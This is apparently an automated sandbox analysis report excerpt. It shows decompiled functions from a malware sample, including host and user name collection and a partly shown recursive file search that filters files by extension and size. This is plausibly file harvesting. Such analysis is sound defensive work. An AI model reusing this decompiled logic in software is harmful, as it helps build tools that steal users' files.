                                                                                                    • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                    • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
                                                                                                    • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                    • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406610 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00406610(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0x100;
				_t7 = GetComputerNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403B80(_t12);
				}
				return E00403D10(_t12, 0x100,  &_v516);
			}







                                                                                                    0x00406611
                                                                                                    0x00406617
                                                                                                    0x00406619
                                                                                                    0x0040662d
                                                                                                    0x00406631
                                                                                                    0x00000000
                                                                                                    0x00406647
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetComputerNameW.KERNEL32(?,?,?,00406CC9,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 0040662D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ComputerName
                                                                                                    • String ID:
                                                                                                    • API String ID: 3545744682-0
                                                                                                    • Opcode ID: 2af783b5739767e8d4c536e17b252dfeff83da64dfa6d14ffe1fd85036e1d617
                                                                                                    • Instruction ID: 379860159244c25a8e01d0f4b2281416c084c7fab84c3155c476f3f5ce753b72
                                                                                                    • Opcode Fuzzy Hash: 2af783b5739767e8d4c536e17b252dfeff83da64dfa6d14ffe1fd85036e1d617
                                                                                                    • Instruction Fuzzy Hash: 41E086712042005BC300EF58DC81AD533D89B88355F10483ABC86D73D1EA7DDE58875B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004065C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004065C8(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403B80(_t13);
				} else {
					_t10 = E00403D10(_t13, 0x100,  &_v516);
				}
				return _t10;
			}










                                                                                                    0x004065c8
                                                                                                    0x004065cd
                                                                                                    0x004065d3
                                                                                                    0x004065d5
                                                                                                    0x004065e9
                                                                                                    0x004065ed
                                                                                                    0x00406603
                                                                                                    0x004065ef
                                                                                                    0x004065fa
                                                                                                    0x004065fa
                                                                                                    0x0040660f

                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2645101109-0
                                                                                                    • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                    • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
                                                                                                    • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                    • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}





                                                                                                    0x00403614
                                                                                                    0x0040361a
                                                                                                    0x00403620

                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 626452242-0
                                                                                                    • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                    • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                                                                                                    • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                    • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403B58 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00403B58(signed int __eax) {
				signed int _t2;
				signed char _t12;
				void* _t14;
				void* _t18;

				_t2 = __eax;
				if(__eax == 0) {
					L11:
					return _t2;
				} else {
					_push(__eax);
					_push(0); // executed
					L00401148(); // executed
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t18 = _t14;
						_t12 = _t2 & 0x0000007f;
						if( *0x41c008 != 0) {
							 *0x41c008();
						}
						if(_t12 != 0) {
							if(_t12 <= 0x18) {
								_t1 = _t12 + 0x41b03c; // 0xd7c9c8cc
								_t12 =  *_t1;
							}
						} else {
							_t12 =  *0x41c624; // 0x0
						}
						return E004025C0(_t18);
					} else {
						goto L11;
					}
				}
			}







                                                                                                    0x00403b58
                                                                                                    0x00403b5a
                                                                                                    0x00403b6c
                                                                                                    0x00403b6c
                                                                                                    0x00403b5c
                                                                                                    0x00403b5c
                                                                                                    0x00403b5d
                                                                                                    0x00403b5f
                                                                                                    0x00403b66
                                                                                                    0x00402614
                                                                                                    0x00402617
                                                                                                    0x004025ce
                                                                                                    0x004025d2
                                                                                                    0x004025dc
                                                                                                    0x004025e2
                                                                                                    0x004025e2
                                                                                                    0x004025ea
                                                                                                    0x004025f7
                                                                                                    0x004025fd
                                                                                                    0x004025fd
                                                                                                    0x004025fd
                                                                                                    0x004025ec
                                                                                                    0x004025ec
                                                                                                    0x004025ec
                                                                                                    0x00402610
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403b66

                                                                                                    APIs
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403B5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2525500382-0
                                                                                                    • Opcode ID: 6a93c3ca907d479a33d1dcb542f32694fca8e70eb7b5483012cc7a01b661989c
                                                                                                    • Instruction ID: bea8321bd29b1b0cb3959915f15724c359703e68ceae1f32cab0dcb1509c9ee6
                                                                                                    • Opcode Fuzzy Hash: 6a93c3ca907d479a33d1dcb542f32694fca8e70eb7b5483012cc7a01b661989c
                                                                                                    • Instruction Fuzzy Hash: 9FB0123460820111FA143D720E01B331C5C0B50B4BF880037AD21F51C3DD7DE901503E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403B70 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 82%
                                                                                                    			E00403B70(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _t4;

				_t4 =  *__eax;
				 *__eax = __edx;
				if(_t4 != 0) {
					_push(_t4); // executed
					L00401158(); // executed
					return __eax;
				}
				return __eax;
			}




                                                                                                    0x00403b70
                                                                                                    0x00403b70
                                                                                                    0x00403b74
                                                                                                    0x00403b76
                                                                                                    0x00403b77
                                                                                                    0x00000000
                                                                                                    0x00403b77
                                                                                                    0x00403b7c

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00403B77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: d497d8846639aaf179110225e0e01da4904a3c484c5354391378440b3d8208c6
                                                                                                    • Instruction ID: 1013a877abc153affaca16d078552d4a9b2fa22a8452acd7ddfc898bd50da8eb
                                                                                                    • Opcode Fuzzy Hash: d497d8846639aaf179110225e0e01da4904a3c484c5354391378440b3d8208c6
                                                                                                    • Instruction Fuzzy Hash: A6A011A800020288CB0A3A2A00008232A3AAFC8308388C0BEA2002A2A28A3E88008028
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x41c5d4; // 0x4d5f9c
				while(_t35 != 0x41c5d4) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x41c5b0 = 1;
						}
						E0040126C(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                                                                    0x00401468
                                                                                                    0x0040146b
                                                                                                    0x0040146f
                                                                                                    0x00401472
                                                                                                    0x0040147c
                                                                                                    0x00401480
                                                                                                    0x00401487
                                                                                                    0x0040148b
                                                                                                    0x004014e4
                                                                                                    0x00401493
                                                                                                    0x00401495
                                                                                                    0x0040149a
                                                                                                    0x004014ab
                                                                                                    0x004014ad
                                                                                                    0x004014ad
                                                                                                    0x004014b3
                                                                                                    0x004014ba
                                                                                                    0x004014bc
                                                                                                    0x004014bc
                                                                                                    0x004014c8
                                                                                                    0x004014cf
                                                                                                    0x004014d1
                                                                                                    0x004014d1
                                                                                                    0x004014dd
                                                                                                    0x004014dd
                                                                                                    0x004014e2
                                                                                                    0x004014e2
                                                                                                    0x004014ec
                                                                                                    0x004014f2
                                                                                                    0x004014f9
                                                                                                    0x00401503
                                                                                                    0x00401509
                                                                                                    0x00401511
                                                                                                    0x00000000
                                                                                                    0x00401511
                                                                                                    0x0040151b

                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                    • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                                                                                                    • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                    • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040151C Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0x4d5f9c
				while(_t29 != 0x41c5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                    0x00401523
                                                                                                    0x00401527
                                                                                                    0x0040152e
                                                                                                    0x00401543
                                                                                                    0x0040154b
                                                                                                    0x00401551
                                                                                                    0x00401557
                                                                                                    0x0040155a
                                                                                                    0x0040159e
                                                                                                    0x00401562
                                                                                                    0x00401568
                                                                                                    0x0040156c
                                                                                                    0x0040156e
                                                                                                    0x0040156e
                                                                                                    0x00401574
                                                                                                    0x00401576
                                                                                                    0x00401576
                                                                                                    0x0040157c
                                                                                                    0x00401589
                                                                                                    0x00401590
                                                                                                    0x00401592
                                                                                                    0x00401598
                                                                                                    0x00000000
                                                                                                    0x00401598
                                                                                                    0x00401590
                                                                                                    0x0040159c
                                                                                                    0x0040159c
                                                                                                    0x004015ad

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401589
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                    • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                                                                                    • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                    • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E004015B0(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x41c5d4; // 0x4d5f9c
				while(_t19 != 0x41c5d4) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x41c5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                    0x004015b4
                                                                                                    0x004015c5
                                                                                                    0x004015cc
                                                                                                    0x004015d5
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015df
                                                                                                    0x0040161f
                                                                                                    0x004015e7
                                                                                                    0x004015ed
                                                                                                    0x004015f2
                                                                                                    0x004015f4
                                                                                                    0x004015f4
                                                                                                    0x004015f9
                                                                                                    0x004015fb
                                                                                                    0x004015fb
                                                                                                    0x004015ff
                                                                                                    0x0040160a
                                                                                                    0x00401611
                                                                                                    0x00401613
                                                                                                    0x00401613
                                                                                                    0x00401611
                                                                                                    0x0040161d
                                                                                                    0x0040161d
                                                                                                    0x0040162c

                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,04C184EC,04C1C4EF,00401817), ref: 0040160A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                    • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                                                    • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                    • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 00414408 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00414408(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v56;
				struct _WIN32_FIND_DATAW _v648;
				char _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				char _v704;
				char _v708;
				char _v712;
				char _v716;
				char _v720;
				char _v724;
				char _v728;
				char _v732;
				char _v736;
				char _v740;
				char _v744;
				intOrPtr _v748;
				char _v752;
				char _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v772;
				char _v776;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				void* _t239;
				void* _t295;
				intOrPtr* _t299;
				void* _t301;
				int _t312;
				int _t333;
				signed int _t343;
				long _t349;
				int _t354;
				int _t377;
				int _t383;
				void* _t387;
				intOrPtr* _t425;
				intOrPtr _t428;
				intOrPtr* _t456;
				int _t460;
				intOrPtr _t464;
				intOrPtr* _t471;
				intOrPtr _t486;
				intOrPtr _t496;
				intOrPtr _t497;
				intOrPtr _t499;
				void* _t534;
				void* _t556;
				void* _t570;
				void* _t573;
				signed int _t575;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr* _t579;

				_t574 = __esi;
				_t458 = __ebx;
				_t577 = _t578;
				_push(__ecx);
				_t464 = 0x62;
				do {
					_push(0);
					_push(0);
					_t464 = _t464 - 1;
					_t580 = _t464;
				} while (_t464 != 0);
				_t1 =  &_v8;
				 *_t1 = _t464;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				E004040F4( &_a20);
				_push(_t577);
				_push(0x414c0d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t578;
				_v20 = 0;
				E004062D8(_v8,  &_v652, _t580);
				E00403BE0( &_v8, _v652);
				E0040377C( &_v656, _a20);
				E0040795C(0x414c2c,  &_v52, _v656, _t580);
				E0040377C( &_v660, _v12);
				E0040795C(0x414c38,  &_v44, _v660, _t580);
				_t239 = E004045EC(_v44);
				_t581 = _t239;
				if(_t239 == 0) {
					L46:
					_pop(_t486);
					 *[fs:eax] = _t486;
					_push(E00414C17);
					E00403B98( &_v792, 2);
					E00403508( &_v784, 2);
					E00403B80( &_v776);
					E00403508( &_v772, 2);
					E00403B98( &_v764, 6);
					E004034E4( &_v740);
					E00403B98( &_v736, 5);
					E00403508( &_v716, 3);
					E00403B98( &_v704, 3);
					E004034E4( &_v692);
					E00403B80( &_v688);
					E004034E4( &_v684);
					E00403B98( &_v680, 5);
					E00403508( &_v660, 2);
					E00403B80( &_v652);
					_t496 =  *0x405f2c; // 0x405f30
					E004047B4( &_v52, _t496);
					E00403B80( &_v48);
					_t497 =  *0x405f2c; // 0x405f30
					E004047B4( &_v44, _t497);
					E00403B98( &_v40, 4);
					_t499 =  *0x4143e4; // 0x4143e8
					E004047B4( &_v24, _t499);
					E00403B98( &_v16, 3);
					_t214 =  &_a20; // 0x414c4c
					return E00403B80(_t214);
				} else {
					_push(E004045EC(_v24) + 1);
					E004047A8();
					_t579 = _t578 + 4;
					_push(_v24 + E004045EC(_v24) * 4 - 4);
					E0040781C(_v8, __ebx,  &_v664, _t581);
					_pop(_t295);
					E00403BBC(_t295, _v664);
					while(E004045EC(_v24) > 0) {
						_t299 =  *0x41b594; // 0x41c828
						_t34 = _t299 + 4; // 0x0
						_t301 =  *_t299 - 0x4b000;
						asm("sbb edx, 0x0");
						_t471 =  *0x41b63c; // 0x41c820
						_t35 = _t471 + 4; // 0x0
						__eflags =  *_t34 -  *_t35;
						if(__eflags != 0) {
							if(__eflags <= 0) {
								goto L46;
							}
							L8:
							E0040781C( *((intOrPtr*)(_v24 + E004045EC(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
							E00403B80(_v24 + E004045EC(_v24) * 4 - 4);
							_t312 = E004045EC(_v24) - 1;
							__eflags = _t312;
							_push(_t312);
							E004047A8();
							_t579 = _t579 + 4;
							E00403DB8( &_v672, 0x414c40, _v28, __eflags);
							E0040781C(_v672, _t458,  &_v668, __eflags);
							_t573 = FindFirstFileW(E00403D3C(_v668),  &_v648);
							do {
								_push(_v28);
								_push(0x414c4c);
								_t474 = 0x104;
								E00403D10( &_v680, 0x104,  &(_v648.cFileName));
								_push(_v680);
								E00403E1C();
								E0040781C(_v676, _t458,  &_v32, __eflags);
								E0040770C(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
									L21:
									__eflags = _a8 - 1;
									if(_a8 != 1) {
										L30:
										__eflags = _a12 - 1;
										if(_a12 != 1) {
											goto L43;
										}
										E00403D10( &_v756, 0x104,  &(_v648.cFileName));
										E00403E64(_v756, 0x414c70);
										if(__eflags == 0) {
											goto L43;
										}
										E00403D10( &_v760, 0x104,  &(_v648.cFileName));
										E00403E64(_v760, 0x414c7c);
										if(__eflags == 0) {
											goto L43;
										}
										_t343 = _v648.dwFileAttributes;
										__eflags = (_t343 & 0x00000010) - 0x10;
										if((_t343 & 0x00000010) != 0x10) {
											goto L43;
										}
										__eflags = (_t343 & 0x00000400) - 0x400;
										if(__eflags == 0) {
											goto L43;
										}
										E0040781C(_v32, _t458,  &_v764, __eflags);
										_t349 = GetFileAttributesW(E00403D3C(_v764));
										__eflags = _t349 - 0xffffffff;
										if(_t349 == 0xffffffff) {
											goto L43;
										}
										_v53 = 0;
										_t458 = E004045EC(_v52) - 1;
										__eflags = _t458;
										if(_t458 < 0) {
											L41:
											__eflags = _v53;
											if(_v53 == 0) {
												_t354 = E004045EC(_v24) + 1;
												__eflags = _t354;
												_push(_t354);
												E004047A8();
												_t579 = _t579 + 4;
												E00403BBC(_v24 + E004045EC(_v24) * 4 - 4, _v32);
											}
											goto L43;
										}
										_t460 = _t458 + 1;
										_t575 = 0;
										__eflags = 0;
										do {
											E0040781C(_v32, _t460,  &_v776, __eflags);
											E0040377C( &_v772, _v776);
											E00406318(_v772, _t460,  &_v768, _t573, _t575);
											_push(_v768);
											E00403D2C( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
											E0040781C(_v792, _t460,  &_v788, __eflags);
											E0040377C( &_v784, _v788);
											E00406318(_v784, _t460,  &_v780, _t573, _t575);
											_pop(_t534);
											_t377 = E00403A78(_v780, _t534);
											__eflags = _t377;
											if(_t377 != 0) {
												_v53 = 1;
											}
											_t575 = _t575 + 1;
											_t460 = _t460 - 1;
											__eflags = _t460;
										} while (__eflags != 0);
										goto L41;
									}
									E0040377C( &_v712, _v36);
									E00406318(_v712, _t458,  &_v708, _t573, _t574);
									_t383 = E00403A78(0x414c58, _v708);
									__eflags = _t383;
									if(_t383 == 0) {
										goto L30;
									}
									E004141B8(_v32, _t458,  &_v40, _t574);
									_t387 = E004068EC(_v40);
									__eflags = _t387 - _a16;
									if(_t387 > _a16) {
										goto L30;
									}
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L30;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040770C(_v40, _t458, _t474,  &_v720, _t574, __eflags);
										E0040377C( &_v716, _v720);
										_t474 = 0;
										__eflags = E00406120(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(__eflags != 0) {
											continue;
										}
										goto L30;
									}
									E0040781C(_v32, _t458,  &_v724, __eflags);
									E00403BE0( &_v32, _v724);
									E0040781C(_v8, _t458,  &_v728, __eflags);
									E00403BE0( &_v8, _v728);
									E0040781C(_v40, _t458,  &_v732, __eflags);
									E00403BE0( &_v40, _v732);
									_push(_v32);
									_push("._.");
									E0040770C(_v40, _t458, 0,  &_v736, _t574, __eflags);
									_push(_v736);
									E00403E1C();
									E00403F34( &_v48, E00403D4C(_v8), 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v748, _t458,  &_v744, __eflags);
									E0040377C( &_v740, _v744);
									_push(_v740);
									E0040781C(_v40, _t458,  &_v752, __eflags);
									_pop(_t556);
									E0040DDB0(_v752, _t458, _t556, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t425 =  *0x41b638; // 0x41b0ac
										 *_t425 =  *_t425 + 1;
									}
									goto L30;
								}
								__eflags = _v648.nFileSizeHigh;
